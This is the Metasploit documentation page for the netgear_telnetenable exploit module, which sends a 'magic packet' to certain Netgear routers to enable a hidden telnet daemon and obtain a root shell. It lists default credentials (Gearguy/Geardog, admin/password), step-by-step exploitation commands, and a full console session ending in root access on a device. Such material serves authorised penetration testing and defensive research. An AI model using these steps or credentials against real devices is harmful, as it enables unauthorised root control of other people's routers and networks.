metasploit-gs/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md

## Intro

Several models of Netgear devices have a hidden telnet daemon that can be
enabled for remote LAN users by sending a 'magic packet' to the device. 
Upon successful connect, a root shell should be presented to the user.

There are many devices which contain this daemon, for a full list see [OpenWrt](https://wiki.openwrt.org/toh/netgear/telnet.console)

This module has been successfully tested against:

 - AC1450 in whatever version I bought it with (TCP)
 - AC1450 latest V1.0.0.36_10.0.17 (UDP)
 - N300 WNR2000 v3 (TCP)

## Setup

A MAC address is required for exploitation.  To determine the MAC address of the device:

1. Ping the device to force an ARP lookup: ```ping -c 1 [IP]```
2. Get the MAC: ```arp -an [IP]```

## Targets

**0 (Automatic)**

Detect if a device listens on TCP or UDP.

**1 (TCP)**

Older devices usually listen on TCP.

**2 (UDP)**

Newer devices usually listen on UDP.

## Options

**MAC**

Set this to the MAC address of the device. You can use `ping` and `arp`
to find it.

**USERNAME**

If this is an older device, it'll take the value of `super_username` in
`nvram`. `Gearguy` is usually correct.

If this is a newer device, it'll take the web UI username, which is
usually unchanged from `admin`.

**PASSWORD**

If this is an older device, it'll take the value of `super_passwd` in
`nvram`. `Geardog` is usually correct.

If this is a newer device, it'll take the web UI password, which is
usually unchanged from `password`.

**VERBOSE**

This will display the username and password used in the magic packet.

## Exploitation 

1. Make sure you have a vulnerable device
2. Start metasploit
3. ```use exploit/linux/telnet/netgear_telnetenable```
4. ```set rhost [IP]```
5. ```set mac [MAC Address]```
6. ```exploit```
7. Enjoy a root shell!

## Usage

```
msf5 > use exploit/linux/telnet/netgear_telnetenable
msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
[*] exec: ping -c 1 192.168.1.1

PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.19 ms

--- 192.168.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.198/1.198/1.198/0.000 ms
msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
[*] exec: arp -an 192.168.1.1

? (192.168.1.1) at [redacted] [ether] on wlan0
msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
mac => [redacted]
msf5 exploit(linux/telnet/netgear_telnetenable) > set verbose true
verbose => true
msf5 exploit(linux/telnet/netgear_telnetenable) > run

[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[*] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.

id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#
```

If you've already exploited TelnetEnable, the exploit will attempt to
connect to `telnetd` directly. This saves us from sending the magic
packet again.

```
msf5 exploit(linux/telnet/netgear_telnetenable) > run

[+] 192.168.1.1:23 - Detected telnetd on TCP
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
```